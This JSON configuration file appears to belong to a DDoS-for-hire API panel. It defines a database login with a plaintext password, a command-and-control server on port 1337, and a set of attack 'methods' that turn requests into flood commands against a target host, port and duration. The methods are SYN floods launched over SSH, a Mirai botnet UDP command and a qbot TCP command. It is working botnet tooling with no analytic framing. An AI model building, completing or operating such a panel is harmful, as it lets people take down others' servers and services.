{
    "server": {
        "host": "localhost",
        "port": 8081
    },
    "mysql": {
        "host": "localhost:3306",
        "user": "toor",
        "pass": "jovansrbija00",
        "name": "goapi"
    },
    "discord": {
        "webhook": "",
        "image": "",
        "developer": "@skiop.sh",
        "website": "brrsecurity.org"
    },
    "cnc_server": {
        "host": "localhost",
        "port": 1337
    },
    "ssh_methods": [
         {
             "name": "",
             "command": "screen -dmS [HOST] python home.py [HOST] [PORT] [TIME]"
         },
         {
             "name": "SYN",
             "command": "screen -dmS [HOST] ./syn -h [HOST] -p [PORT] -t [TIME]"
         },
         {
             "name": "STOP",
             "command": "pkill [HOST] -f"
         }
    ],
    "mirai_methods": [
        {
            "name": "UDP",
            "command": ".udp [HOST] [TIME] dport=[PORT]"
        }
    ],
    "qbot_methods": [
        {
            "name": "TCP",
            "command": "/tcp [HOST] [PORT] [TIME]"
        }
    ]
}